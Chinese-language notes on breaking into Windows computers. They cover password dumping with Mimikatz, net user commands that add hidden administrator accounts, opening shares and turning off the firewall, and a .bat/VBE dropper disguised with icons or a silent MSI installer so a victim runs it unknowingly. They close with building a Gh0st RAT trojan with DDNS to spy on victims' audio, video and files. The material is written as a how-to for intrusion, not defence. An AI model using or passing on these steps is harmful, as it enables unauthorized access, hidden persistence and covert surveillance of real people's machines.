Windows系统密码破解
-
BIOS密码(拆机抠电池...)
-
关机状态下(PC):
- windows pe |大白菜|老毛桃
-
正在开机的电脑密码破解:
-
控制台Windows日志记录所有的操作情况(清除Windows日志本身操作也被记录到日志里)
-
无损的情况下知道Windows密码
-
mimikatez(猕猴桃):自动读取Windows密码(攻击服务器之后使用猕猴桃获得系统密码以合法身份入侵系统)这是一个猕猴桃(先关闭电脑杀毒软件)
-
几个cmd命令:
net user(查看当前电脑用户)net user [用户名] [密码] /add(增加一个用户)net user [用户名] /del(删除用户)net user [用户名]$ [密码] /add(增加隐形用户) -
增加用户后提权:
-
net localgroup users administrators [用户名] -
net localgroup users [用户名] /del删除user中的用户是此用户成为真正的管理员用户,提权成功! -
CMD输入
net share查看共享情况- 给系统开共享:
net share [name]=[目标盘符,如C:] net share [name] /del删除共享net view查看内网(局域网)开了共享的计算机名,用映射网络驱动器连接对方系统共享,将对方系统内容共享到自己系统(需要提权)
- 给系统开共享:
-
使用Powershell关掉对方防火墙
-
总结:
-
新建一个文本文档将上述命令输入,更改文件名为.bat,对方打开此文件即可获得对方电脑权限。
-
接下来需要隐藏.bat运行时的黑框:
新建.vbe: set ws=greatobject("wscript.shell") do ws.run "C: ame.bat",0 wscript.sleep 9000 loop-
将vbe文件添加压缩包(高级自解压到C盘,将文件进行隐藏和”化妆“更改图标)|msi静默安装包
-
很多合法软件都可以做feifa的事情
基础知识
-
学习powershell
-
msi静默安装
-
远程管理程序|木马
- this is a muma|Gh0st RAT Beta ,C++写的开源木马生成器(GayHub有源码)可以去做逆向工程免杀
- 监听端口|上线主机(IP)|两个端口一致
- 动态域名(DDNS):花生壳(下载软件,注册送动态域名--》公网ip)|租一台公网VPS
- 生成.exe(自己不要点|自己中自己的木马)
- 别人点了之后就可以通过Gh0st远程控制对方计算机
- 可以监听对方语音,视频,查看删除文件,访问网址,清除日志,下载更新,下载执行
-
-